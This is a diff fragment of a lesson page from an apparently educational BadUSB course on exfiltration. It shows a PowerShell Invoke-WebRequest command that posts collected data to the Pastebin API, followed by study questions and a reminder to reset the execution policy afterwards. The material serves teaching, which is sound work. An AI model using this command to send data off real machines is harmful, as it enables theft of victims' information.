kenvb/badusb/docs/05exfiltration.md

 Invoke-WebRequest -Uri "https://pastebin.com/api/api_post.php" -UseBasicParsing -Body $Body -Method Post -OutFile $Title.txt
 ```
 Observe the concatenation done in those 2 files.

+# To think about...
-What is the difference between 4 and 5?
+1) What is the difference between 4 and 5?
 Why would this be?
+2) [Read up](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4) on the set-executionpolicy settings and don't forget to change them when this exercise is over.